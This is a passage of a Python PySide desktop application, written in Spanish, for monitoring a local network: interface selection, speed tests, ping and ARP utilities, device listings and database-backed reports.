setGATEWAY(self,gate):\r\n self.GATEWAY=gate\r\n def getGATEWAY(self):\r\n return self.GATEWAY\r\n def setInterfaz(self,inter):\r\n self.INTERFAZ=inter\r\n def getInterfaz(self):\r\n return self.INTERFAZ\r\n def Iniciarconfiguracion(self):\r\n if os.path.exists('modulos/BasesDatos/configuracion.conf')==False:\r\n config=open(\"modulos/BasesDatos/configuracion.conf\",\"w\",encoding=\"utf-8\")\r\n self.VENTANA=\"Propia del Software\"\r\n config.write('Propia del Software\\n')\r\n self.TEMA=\"Obscuro\"\r\n config.write('Obscuro\\n')\r\n self.DETECCION=\"Preciso (ARP y Ping)\"\r\n config.write('Preciso (ARP y Ping)\\n')\r\n self.TIEMPO_DETECCION=20.0\r\n config.write('20\\n')\r\n self.TIEMPO_PAQ=0.5\r\n config.write('0.5')\r\n config.close()\r\n else:\r\n aux=open(\"modulos/BasesDatos/configuracion.conf\",\"r\",encoding=\"utf-8\")\r\n contenido=aux.readlines()\r\n self.VENTANA=contenido[0].replace(\"\\n\",\"\")\r\n self.TEMA=contenido[1].replace(\"\\n\",\"\")\r\n self.DETECCION=contenido[2].replace(\"\\n\",\"\")\r\n self.TIEMPO_DETECCION=float(contenido[3].replace(\"\\n\",\"\"))\r\n self.TIEMPO_PAQ=float(contenido[4].replace(\"\\n\",\"\"))\r\n aux.close()\r\n def verificarNpcap(self):\r\n if os.path.isdir('C:\\\\Program Files\\\\Npcap') or os.path.isdir('C:\\\\Program Files (x86)\\\\Npcap') or os.path.isdir('C:\\\\Archivos de programa\\\\Npcap') or os.path.isdir('C:\\\\Archivos de programa (x86)\\\\Npcap') or os.path.isdir('C:\\\\Program Files\\\\WinPcap') or os.path.isdir('C:\\\\Program Files (x86)\\\\WinPcap') or os.path.isdir('C:\\\\Archivos de programa\\\\WinPcap') or os.path.isdir('C:\\\\Archivos de programa (x86)\\\\WinPcap'):\r\n print(\"-- DEPENDENCIA: Winpcap esta instalado.\")\r\n else:\r\n print(\"[i] DEPENDENCIA: Winpcap no esta instalado.\")\r\n sb.run(('Dependencias/winpcap.exe'))\r\n os.execl(sys.executable, \"main.py\", *sys.argv)\r\n def verificarSpeed(self):\r\n if os.path.isdir(os.path.expanduser('~')+'\\\\AppData\\\\Roaming\\\\Ookla'):\r\n print(\"-- DEPENDENCIA: Terminos de Ookla aceptados.\")\r\n else:\r\n print(\"[!] 
DEPENDENCIA: No se han aceptado los terminos de Ookla, corrigiendo.\")\r\n print(\"\\n\")\r\n print(\"######################################################################\")\r\n print(\"## Para comenzar acepte los terminos de SpeedTest, coloque YES ##\")\r\n print(\"######################################################################\")\r\n sb.run([\"modulos/SpeedTest/speedtest.exe\"])\r\n \r\nclass DispositivosClass(QFrame):\r\n INTER=None\r\n def __init__(self,INTER,tema,info):\r\n super(DispositivosClass,self).__init__()\r\n NOM=QLabel()\r\n self.INTER=INTER\r\n if INTER[3] != \"--\" or INTER[6] != \"--\":\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2]+\"
IPv4:
  • IP: \"+INTER[3]+\"
  • Sub-Máscara:\"+INTER[4]+\"
  • Gateway:\"+INTER[5]+\"
IPV6: \"+INTER[6])\r\n elif INTER[3] != \"--\":\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2]+\"
IPv4:
  • IP: \"+INTER[3]+\"
  • Sub-Máscara:\"+INTER[4]+\"
  • Gateway:\"+INTER[5]+\"
\")\r\n elif INTER[6] != \"--\":\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2]+\"
IPV6: \"+INTER[6])\r\n else:\r\n NOM.setText(\"Nombre Interfaz:
->\"+INTER[0]+\"
ID:
->\"+INTER[1]+\"
MAC:
->\"+INTER[2])\r\n\r\n #BROADCAST=QLabel(INTER[7])\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n if \"Wi-Fi\" in INTER[0] or \"WI-FI\" in INTER[0] or \"wi-fi\" in INTER[0] or \"Wireless\" in INTER[0] or \"WIRELESS\" in INTER[0] or \"wireless\" in INTER[0] or \"wlan\" in INTER[0] or \"wlp\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/WIFI.png').scaled(50,50)\r\n elif \"Virtual\" in INTER[0] or \"VIRTUAL\" in INTER[0] or \"virtual\" in INTER[0] or \"VM\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/VMW.png').scaled(50,50)\r\n elif \"Local\" in INTER[0] or \"local\" in INTER[0] or \"LOCAL\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/LAN.png').scaled(50,50)\r\n elif \"BLUETOOTH\" in INTER[0] or \"Bluetooth\" in INTER[0] or \"bluetooth\" in INTER[0] or \"luetoo\" in INTER[0]:\r\n pixmap = QPixmap('Imagenes/INTER/BLUE.png').scaled(50,50)\r\n else:\r\n pixmap = QPixmap('Imagenes/INTER/DESC.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Aux.addWidget(QLabel(\"\"))\r\n Aux.addWidget(label)\r\n Aux.addWidget(QLabel(\"\"))\r\n Layout.addWidget(Aux2,0,0)\r\n Layout.addWidget(NOM,1,0)\r\n\r\n def SeleccionInter():\r\n info.setInterfaz(self.INTER[0])\r\n info.setIPV4(self.INTER[3])\r\n info.MASCARA=self.INTER[4]\r\n info.setGATEWAY(self.INTER[5])\r\n info.CAMBIOS=True\r\n if INTER[3] != \"--\" and INTER[3] != \"127.0.0.1\" and INTER[5]!=\"--\":\r\n SELECT = QPushButton(\"Seleccionar Interfaz\")\r\n if tema==\"Obscuro\":\r\n SELECT.setStyleSheet(\"background-color:#2c313c; border-radius:3px;\")\r\n else:\r\n SELECT.setStyleSheet(\"background-color:#D8D8D8;border: 1px solid;border-color:#333333;\")\r\n\r\n SELECT.clicked.connect(SeleccionInter)\r\n Layout.addWidget(SELECT,2,0)\r\n if tema==\"Obscuro\":\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\")\r\n self.setLayout(Layout)\r\nclass pendientesClass(QFrame):\r\n def __init__(self,INTER,tema,inf):\r\n super(pendientesClass,self).__init__()\r\n FECHA=INTER[2]\r\n DES=INTER[1]\r\n RED=INTER[6]\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n pixmap = QPixmap('Imagenes/pendientes.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Layout.addWidget(label,0,0)\r\n Layout.addWidget(QLabel(FECHA),0,1)\r\n Layout.addWidget(QLabel(RED),0,2)\r\n Layout.addWidget(QLabel(DES),0,3)\r\n if tema==\"Obscuro\":\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\") \r\n self.setLayout(Layout)\r\nclass UsuariosClass(QFrame):\r\n def __init__(self,INTER,tema,inf):\r\n super(UsuariosClass,self).__init__()\r\n Layout = QGridLayout()\r\n label = QLabel(self)\r\n if INTER[0] == inf.GATEWAY:\r\n pixmap = QPixmap('Imagenes/DISP/ROUTER.png').scaled(50,50)\r\n elif INTER[0] != INTER[3]:\r\n pixmap = QPixmap('Imagenes/DISP/PC.png').scaled(50,50)\r\n else:\r\n pixmap = QPixmap('Imagenes/DISP/HOST.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n NOM=QLabel()\r\n if INTER[0] == inf.IPV4:\r\n NOM.setText(\"Usuario: \"+INTER[3]+\" (Tu Dispositivo)
IP: \"+INTER[0]+\"
MAC: \"+INTER[1]+\"
Vendor: \"+INTER[2])\r\n else:\r\n NOM.setText(\"Usuario: \"+INTER[3]+\"
IP: \"+INTER[0]+\"
MAC: \"+INTER[1]+\"
Vendor: \"+INTER[2])\r\n NOM.wordWrap()\r\n Aux2=QWidget()\r\n Aux = QHBoxLayout()\r\n Aux2.setLayout(Aux)\r\n Aux.addWidget(QLabel(\"\"))\r\n Aux.addWidget(label)\r\n Aux.addWidget(QLabel(\"\"))\r\n Layout.addWidget(label,0,0)\r\n Layout.addWidget(NOM,1,0)\r\n if tema==\"Obscuro\":\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#1f232a; Border-Radius:10px; }\")\r\n else:\r\n self.setStyleSheet(\"QLabel{border-color:black;} QFrame{Background-color:#D8D8D8; Border-Radius:10px; }\") \r\n self.setLayout(Layout)\r\nclass TraficoVar():\r\n VAR=[\"ID\",\"T\",\"P\",\"L\",\"S\",\"D\",\"E\"]\r\n Cerrar=False\r\n Borrar=False\r\n velocidad=[]\r\nclass MainWindow(QMainWindow):\r\n signalUser = Signal(int)\r\n signalPing = Signal(int)\r\n signalTrafico = Signal(int)\r\n SignalV=Signal(int)\r\n tab=Signal(int)\r\n SignalVT=Signal(int)\r\n SignalVTL=Signal(int)\r\n SignalA=Signal(int)\r\n\r\n GLOBAL_STATE=False\r\n inf=Informacion_Red()\r\n TrafObj=TraficoVar()\r\n\r\n VEL=None\r\n def __init__(self):\r\n super(MainWindow, self).__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n self.GLOBAL_STATE=False\r\n ##QUITAR DECORACION \r\n if self.inf.VENTANA==\"Propia del Software\":\r\n self.setWindowFlags(Qt.FramelessWindowHint)\r\n else:\r\n self.ui.SalirBtn.hide()\r\n self.ui.MinBtn.hide()\r\n self.ui.MaxBtn.hide()\r\n if self.inf.TEMA!=\"Obscuro\":\r\n file = QFile(\"modulos/BasesDatos/claro.qss\")\r\n file.open(QFile.ReadOnly | QFile.Text)\r\n stream = QTextStream(file)\r\n self.setStyleSheet(stream.readAll())\r\n self.inf.verificarNpcap()\r\n self.inf.verificarSpeed()\r\n ##############################################\r\n ## ACCION DE LOS BOTONES\r\n ##############################################\r\n self.ui.SalirBtn.clicked.connect(self.Cerrar)\r\n self.ui.MinBtn.clicked.connect(self.Minimizar)\r\n self.ui.MaxBtn.clicked.connect(self.Maximizar_Restaurar)\r\n\r\n self.ui.Menu.clicked.connect(lambda: self.Menu_Izquierdo())\r\n self.ui.AjustesBtn.clicked.connect(self.Ajustes)\r\n self.ui.AyudaBtn.clicked.connect(self.Ayuda)\r\n self.ui.UserBtn.clicked.connect(lambda: self.Usuarios())\r\n self.ui.InterRedBtn.clicked.connect(lambda: self.Dipositivos())\r\n self.ui.AlertasBtn.clicked.connect(lambda: self.Alerta())\r\n \r\n self.ui.IPConfBtn.clicked.connect(lambda:self.IPCONFIG())\r\n self.ui.PingBtn.clicked.connect(lambda:self.PING())\r\n self.ui.ArpBtn.clicked.connect(lambda: self.ARP())\r\n self.ui.TracerBtn.clicked.connect(lambda:self.TRACERT())\r\n self.ui.RouteBtn.clicked.connect(lambda:self.ROUTE())\r\n self.ui.IPConfBtn.clicked.connect(lambda:self.IPCONFIG())\r\n self.ui.NSLookBtn.clicked.connect(lambda:self.NS())\r\n\r\n self.ui.AplicarAjusBtn.clicked.connect(self.AplicarConf)\r\n\r\n\r\n ##############################################\r\n ## BOTONES PAGINAS\r\n ##############################################\r\n self.ui.VelocidadBtn.clicked.connect(self.Velocidad)\r\n self.ui.DashboardBtn.clicked.connect(self.DashBoard)\r\n self.ui.GestionBtn.clicked.connect(self.Gestion)\r\n self.ui.TraficoBtn.clicked.connect(self.Trafico)\r\n self.ui.UtilidadesBtn.clicked.connect(self.Utilidades)\r\n self.ui.RerportesBtn.clicked.connect(self.Reportes)\r\n self.ui.BasuraNotif.clicked.connect(self.BorrarNo)\r\n ######################## Menus\r\n self.ui.DerechoBtn.clicked.connect(self.cerrar_MenuD)\r\n self.ui.MasMenuBtn.clicked.connect(self.cerrar_MenuC)\r\n self.ui.CerrarNotif.clicked.connect(self.cerrar_MenuN)\r\n\r\n 
self.ui.FiltradoSpeed.textChanged.connect(self.FiltrarSpeed)\r\n self.ui.Filtrado.textChanged.connect(self.FiltrarPaquete)\r\n ##Funcionalidades\r\n self.ui.PruebaVelBtn.clicked.connect(self.pruebaVel) \r\n self.ui.PruebaVelTBtn.clicked.connect(self.pruebaVelT) \r\n self.ui.BorrarPruebas.clicked.connect(self.borrarVel)\r\n #Trafico de paquetes\r\n self.ui.InicioTraficoBtn.clicked.connect(self.trafico)\r\n ############## Botones Gestion\r\n\r\n self.ui.G_PR.clicked.connect(self.DBproblemasRed)\r\n self.ui.G_R.clicked.connect(self.DBreportes)\r\n self.ui.G_I.clicked.connect(self.DBinvernario)\r\n self.ui.G_P.clicked.connect(self.DBProveedores)\r\n self.ui.G_RD.clicked.connect(self.DBRedes)\r\n self.ui.G_C.clicked.connect(self.DBConexiones)\r\n self.ui.G_H.clicked.connect(self.DBHosts)\r\n self.ui.G_CR.clicked.connect(self.DBControlRed)\r\n self.ui.G_SU.clicked.connect(self.DBUnidades)\r\n self.ui.G_D.clicked.connect(self.DBDepartamentos)\r\n self.ui.GAgregarBtn.clicked.connect(self.DBagregar)\r\n self.ui.GModificarBtn.clicked.connect(self.DBModificar)\r\n self.ui.GEliminarBtn.clicked.connect(self.DBEliminar)\r\n\r\n self.ui.CR_ADD.clicked.connect(self.DBCR_ADD)\r\n self.ui.D_ADD.clicked.connect(self.DBD_ADD)\r\n self.ui.I_ADD.clicked.connect(self.DBI_ADD)\r\n self.ui.P_ADD.clicked.connect(self.DBP_ADD)\r\n self.ui.G_AgregarBtn.clicked.connect(self.DBP_PR)\r\n self.ui.R_ADD.clicked.connect(self.DBP_R)\r\n self.ui.RD_ADD.clicked.connect(self.DBP_RD)\r\n self.ui.SU_ADD.clicked.connect(self.DBP_SU)\r\n \r\n self.ui.GFiltrado.textChanged.connect(self.Filtrar)\r\n ############### Utilidades\r\n self.ui.PingIniciarBtn.clicked.connect(self.utilidadPingIniciar)\r\n self.ui.PingAyudaBtn.clicked.connect(self.utilidadPingAyuda)\r\n\r\n self.ui.Iconfig1.clicked.connect(self.IPCAll)\r\n self.ui.Iconfig2.clicked.connect(self.IPCDDNS)\r\n self.ui.Iconfig3.clicked.connect(self.IPCFDNS)\r\n self.ui.Iconfig4.clicked.connect(self.IPCRDNS)\r\n self.ui.Iconfig5.clicked.connect(self.IPCAYUDA)\r\n self.ui.Iconfig6.clicked.connect(self.IPCMANUAL)\r\n \r\n self.ui.arp1.clicked.connect(self.ARPA)\r\n self.ui.arp2.clicked.connect(self.ARPC)\r\n self.ui.arp5.clicked.connect(self.ARPADD)\r\n self.ui.arp7.clicked.connect(self.ARPR)\r\n self.ui.ArpAyuda.clicked.connect(self.ARPAY)\r\n\r\n self.ui.NSLOIniciarBtn.clicked.connect(self.NSLOI)\r\n self.ui.NSLOAyudaBtn.clicked.connect(self.NSLOA)\r\n\r\n self.ui.TracertAyudaBtn.clicked.connect(self.tracertA)\r\n self.ui.TracertIniciarBtn.clicked.connect(self.tracertI)\r\n\r\n self.ui.var1.clicked.connect(self.VMac)\r\n self.ui.var2.clicked.connect(self.VARP)\r\n self.ui.var3.clicked.connect(self.speedtest)\r\n self.ui.var4.clicked.connect(self.fast)\r\n self.ui.var5.clicked.connect(self.MRed)\r\n self.ui.var6.clicked.connect(self.MTareas)\r\n self.ui.var7.clicked.connect(self.RCompartidos)\r\n self.ui.var8.clicked.connect(self.cmd)\r\n ############### Reportes\r\n self.ui.GRG.clicked.connect(self.RGeneral)\r\n self.ui.GR1.clicked.connect(self.RVelocidad)\r\n self.ui.GR2.clicked.connect(self.RServicio)\r\n self.ui.GR3.clicked.connect(self.RClues)\r\n self.ui.GR4.clicked.connect(self.RDisp)\r\n self.ui.GR5.clicked.connect(self.RHistorial)\r\n self.ui.GR6.clicked.connect(self.RProveedores)\r\n self.ui.GR7.clicked.connect(self.RInventario)\r\n self.ui.GR8.clicked.connect(self.RProblemas)\r\n\r\n self.ui.GRBorrarH.clicked.connect(self.BRHistorial)\r\n self.ui.GRBorrarS.clicked.connect(self.BRServicio)\r\n self.ui.GRBorrarP.clicked.connect(self.BRPruebas)\r\n 
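# Report maintenance: the GRBorrar* buttons wire to BR* slots that clear the stored history, service, speed-test and problem records respectively.\r\n        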
self.ui.GRBorrarPr.clicked.connect(self.BRProblemas)\r\n\r\n\r\n ############### Trafico \r\n self.ui.VerDomBtn.clicked.connect(self.dominios)\r\n self.ui.SalirSalidaPaq.clicked.connect(self.salirPaq)\r\n self.ui.RestabBtn.clicked.connect(self.BorrarTabla)\r\n ###############Señales\r\n self.signalUser.connect(self.UsuariosDisp)\r\n self.signalPing.connect(self.putPing)\r\n self.signalTrafico.connect(self.FiltrarPaquete)\r\n self.SignalV.connect(self.putVelocidad)\r\n self.SignalVT.connect(self.putVelocidadT)\r\n self.SignalVTL.connect(self.pruebaCompletaVT)\r\n self.senalS.connect(self.crearGraficaSignal)\r\n self.SignalA.connect(self.SignalAlerta)\r\n self.tab.connect(self.crearTablas)\r\n ##############Modificar tabla\r\n \r\n self.ui.PINGOUT.setColumnWidth(0,50)\r\n self.ui.PINGOUT.setColumnWidth(1,100)\r\n self.ui.PINGOUT.setColumnWidth(2,100)\r\n self.ui.PINGOUT.setColumnWidth(3,70)\r\n self.ui.PINGOUT.setColumnWidth(4,70)\r\n\r\n self.ui.TablaPaquetes.doubleClicked.connect(self.Doubleclick)\r\n self.ui.SalidaGestion.doubleClicked.connect(self.dobleGestion)\r\n self.ui.TablaVelocidad.doubleClicked.connect(self.dobleVelocidad)\r\n \r\n self.ui.Ajus4.textChanged.connect(lambda text: self.validarNumero(self.ui.Ajus4))\r\n self.ui.Ajus5.textChanged.connect(lambda text: self.validarNumero(self.ui.Ajus5))\r\n self.ui.RD_DAJ.textChanged.connect(lambda text: self.validarNumero(self.ui.RD_DAJ))\r\n self.ui.RD_SUB.textChanged.connect(lambda text: self.validarNumero(self.ui.RD_SUB))\r\n self.ui.ping3.textChanged.connect(lambda text: self.validarNumero(self.ui.ping3))\r\n self.ui.ping12.textChanged.connect(lambda text: self.validarNumero(self.ui.ping12))\r\n self.ui.ping2.textChanged.connect(lambda text: self.validarNumero(self.ui.ping2))\r\n self.ui.ping4.textChanged.connect(lambda text: self.validarNumero(self.ui.ping4))\r\n self.ui.tracert1.textChanged.connect(lambda text: self.validarNumero(self.ui.tracert1))\r\n self.ui.tracert2.textChanged.connect(lambda text: self.validarNumero(self.ui.tracert2))\r\n self.actualizarDatosDash()\r\n self.crearTablas()\r\n \r\n self.DBproblemasRed()\r\n disp = QVBoxLayout()\r\n disp.addWidget(QLabel(f\"
\n\nBuscando Dispositivos en {self.inf.SSID}...\n\n
\")) \r\n aux2=QWidget()\r\n aux2.setLayout(disp)\r\n aux2.setContentsMargins(0,0,0,0)\r\n self.ui.scrollArea_2.setWidget(aux2)\r\n self.ui.label_5.setText(f\"
\n\nRed: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}\n\n
\")\r\n\r\n self.mostrarErrores()\r\n \r\n Usuarios = Thread(target=self.hilo_usuarios)\r\n Usuarios.start()\r\n RedCambios = Thread(target=self.CambiosRed)\r\n RedCambios.start()\r\n\r\n sen=Thread(target=self.senal)\r\n sen.start()\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n\r\n velocidad=None\r\n def dobleVelocidad(self):\r\n row_number=0\r\n for idx in self.ui.TablaVelocidad.selectionModel().selectedIndexes():\r\n row_number = idx.row()\r\n aux=[]\r\n for i in range(0,self.ui.TablaVelocidad.columnCount()):\r\n aux.append(self.ui.TablaVelocidad.item(row_number,i).text())\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{aux[5]}'\")\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n SubidaPor=float(aux[6])*100/subida\r\n BajadaPor=float(aux[7])*100/bajada\r\n if self.inf.TEMA==\"Obscuro\":\r\n BIEN=\"QFrame{background-color:#282a36; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MEDIO=\"QFrame{background-color:#282a36; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MAL=\"QFrame{background-color:#282a36; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n else:\r\n BIEN=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#02AC66;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MEDIO=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#024A86;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MAL=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#C82A54;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n self.ui.Subida_Salida.setText(aux[6]+\" Mbps\")\r\n if SubidaPor>90: self.ui.Subida_C.setStyleSheet(BIEN)\r\n elif SubidaPor<90 and SubidaPor>50: self.ui.Subida_C.setStyleSheet(MEDIO)\r\n elif SubidaPor>50: self.ui.Subida_C.setStyleSheet(MAL)\r\n self.ui.Velocidad_Salida.setText(aux[7]+\" Mbps\")\r\n if BajadaPor>90: self.ui.Velocidad_C.setStyleSheet(BIEN)\r\n elif BajadaPor<90 and BajadaPor>50: self.ui.Velocidad_C.setStyleSheet(MEDIO)\r\n elif BajadaPor>50: self.ui.Velocidad_C.setStyleSheet(MAL)\r\n self.ui.Ping_Salida.setText(aux[10]+\" ms\")\r\n if float(aux[10])<50: self.ui.Ping_C.setStyleSheet(BIEN)\r\n elif float(aux[10])<100 and float(aux[10])>50: self.ui.Ping_C.setStyleSheet(MEDIO)\r\n elif float(aux[10])>100: self.ui.Ping_C.setStyleSheet(MAL)\r\n\r\n self.ui.SpeedRed.setText(aux[5])\r\n self.ui.SpeedBajada.setText(aux[9]+\" ms\")\r\n self.ui.SpeedSubida.setText(aux[8]+\" ms\")\r\n self.ui.SpeedServidor.setText(aux[3])\r\n self.ui.SpeedSponsor.setText(aux[4])\r\n def borrarVel(self):\r\n db.ejecutarAccion(\"DELETE FROM PRUEBAS_VELOCIDAD\")\r\n self.DBPruebas() \r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Pruebas de Velocidad\",\"Se han borrado las pruebas de red.\"])\r\n def pruebaVel(self):\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px; color:#FFFFFF;\")\r\n self.ui.PruebaVelBtn.setText(\"Espera un momento\")\r\n self.ui.PruebaVelBtn.setEnabled(False)\r\n self.ui.PruebaVelTBtn.setEnabled(False)\r\n \r\n hilo=Thread(target=self.hiloVel)\r\n hilo.start()\r\n def pruebaVelT(self):\r\n self.ui.PruebaVelTBtn.setStyleSheet(\"border-radius:10px;background-color: #20945e;\tpadding: 8px 8px; color:#FFFFFF;\")\r\n self.ui.PruebaVelTBtn.setText(\"Espera un momento\")\r\n self.ui.PruebaVelTBtn.setEnabled(False)\r\n 
self.ui.PruebaVelBtn.setEnabled(False)\r\n hilo=Thread(target=self.hiloVelT)\r\n hilo.start()\r\n def hiloVelT(self):\r\n try:\r\n self.velocidad=sd.velocidad_Todo(self.TrafObj,self.SignalVT,self.inf,self.SignalVTL)\r\n except:\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Conexión red.\",\"Hay un error general\"])\r\n self.mostrarErrores()\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n self.ui.PruebaVelBtn.setEnabled(True)\r\n def hiloVel(self):\r\n try:\r\n self.velocidad=sd.Velocidad_Internet(self.inf)\r\n self.SignalV.emit(1)\r\n except:\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",self.inf.SSID,\"No hay internet en la red para la prueba.\"])\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color: #1f232a;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PruebaVelBtn.setStyleSheet(\"border-radius:10px;background-color:#D8D8D8; padding: 8px 8px;\")\r\n self.ui.PruebaVelBtn.setText(\"Iniciar\")\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n self.ui.PruebaVelBtn.setEnabled(True)\r\n self.mostrarErrores()\r\n\r\n def putVelocidadT(self):\r\n \r\n now = dt.now()\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{self.inf.SSID}'\")\r\n red=r[0][0]\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n self.ui.Velocidad_Salida.setText(str(self.TrafObj.velocidad[0])+\" Mbps\")\r\n self.ui.Subida_Salida.setText(str(self.TrafObj.velocidad[1])+\" Mbps\")\r\n self.ui.Ping_Salida.setText(str(self.TrafObj.velocidad[4])+ \" ms\")\r\n if subida==0:subida=float(self.TrafObj.velocidad[1])\r\n if bajada==0: bajada=float(self.TrafObj.velocidad[0])\r\n SubidaPor=float(self.TrafObj.velocidad[1])*100/subida\r\n BajadaPor=float(self.TrafObj.velocidad[0])*100/bajada\r\n Porcentaje=(SubidaPor+BajadaPor)/2\r\n Ping=float(self.TrafObj.velocidad[4])\r\n if self.inf.TEMA==\"Obscuro\":\r\n BIEN=\"QFrame{background-color:#282a36; border:10px solid; border-color:#02AC66;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MEDIO=\"QFrame{background-color:#282a36; border:10px solid; border-color:#024A86;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n MAL=\"QFrame{background-color:#282a36; border:10px solid; border-color:#C82A54;color:#f8f8f2;border-radius:100px;} QLabel{Border:0px}\"\r\n else:\r\n BIEN=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#02AC66;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MEDIO=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#024A86;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n MAL=\"QFrame{background-color:#D8D8D8; border:10px solid; border-color:#C82A54;color:#333333;border-radius:100px;} QLabel{Border:0px;color:#333333;}\"\r\n if SubidaPor>=80: self.ui.Subida_C.setStyleSheet(BIEN)\r\n elif SubidaPor<80 and SubidaPor>=50: self.ui.Subida_C.setStyleSheet(MEDIO)\r\n elif SubidaPor<50: self.ui.Subida_C.setStyleSheet(MAL)\r\n \r\n if BajadaPor>=80: self.ui.Velocidad_C.setStyleSheet(BIEN)\r\n elif BajadaPor<80 and BajadaPor>=50: self.ui.Velocidad_C.setStyleSheet(MEDIO)\r\n elif BajadaPor<50: self.ui.Velocidad_C.setStyleSheet(MAL)\r\n \r\n if Ping<=50: self.ui.Ping_C.setStyleSheet(BIEN)\r\n elif Ping<=100 and BajadaPor>50: self.ui.Ping_C.setStyleSheet(MEDIO)\r\n elif Ping>100: self.ui.Ping_C.setStyleSheet(MAL)\r\n\r\n Estado=\"\"\r\n if Porcentaje>=95:Estado=\"Excelente\"\r\n elif Porcentaje>=70 and Porcentaje<95:Estado=\"Bueno\"\r\n elif Porcentaje>=40 and 
Porcentaje<70:Estado=\"Regular\"\r\n elif Porcentaje<40:Estado=\"Malo\"\r\n self.ui.SpeedBajada.setText(self.TrafObj.velocidad[2]+\" ms\")\r\n self.ui.SpeedSubida.setText(self.TrafObj.velocidad[3]+\" ms\")\r\n self.ui.SpeedServidor.setText(self.TrafObj.velocidad[5])\r\n self.ui.SpeedSponsor.setText(self.TrafObj.velocidad[6].replace(\"ISP:\",\"\"))\r\n db.insertarPRUEBAS_VELOCIDAD(red,f\"{now.year}-{now.month}-{now.day}\",f\"{now.hour}:{now.minute}\",self.TrafObj.velocidad[5],self.TrafObj.velocidad[6].replace(\"ISP:\",\"\"),float(self.TrafObj.velocidad[1]),float(self.TrafObj.velocidad[0]),float(self.TrafObj.velocidad[2]),self.TrafObj.velocidad[3],float(self.TrafObj.velocidad[4]),Estado)\r\n self.DBPruebas() \r\n def pruebaCompletaVT(self):\r\n if self.inf.TEMA==\"Obscuro\":\r\n self.ui.PruebaVelTBtn.setStyleSheet(\"border-radius:10px;background-color: #1f232a;\tpadding: 8px 8px;\")\r\n else:\r\n self.ui.PruebaVelTBtn.setStyleSheet(\"border-radius:10px;background-color: #FFFFFF;\tpadding: 8px 8px;\")\r\n self.ui.PruebaVelTBtn.setText(\"Iniciar para todas las redes.(Wi-Fi)\")\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n self.ui.PruebaVelTBtn.setEnabled(True)\r\n def putVelocidad(self):\r\n now = dt.now()\r\n r=db.consultar(f\"SELECT ID_RED,SUBIDA,BAJADA FROM RED WHERE SSID='{self.inf.SSID}'\")\r\n red=r[0][0]\r\n subida=r[0][1] \r\n bajada=r[0][2]\r\n self.ui.Velocidad_Salida.setText(str(self.velocidad[0])+\" Mbps\")\r\n self.ui.Subida_Salida.setText(str(self.velocidad[1])+\" Mbps\")\r\n self.ui.Ping_Salida.setText(str(self.velocidad[4])+ \" ms\")\r\n if subida==0:subida=float(self.velocidad[1])\r\n if bajada==0: bajada=float(self.velocidad[0])\r\n SubidaPor=float(self.velocidad[1])*100/subida\r\n 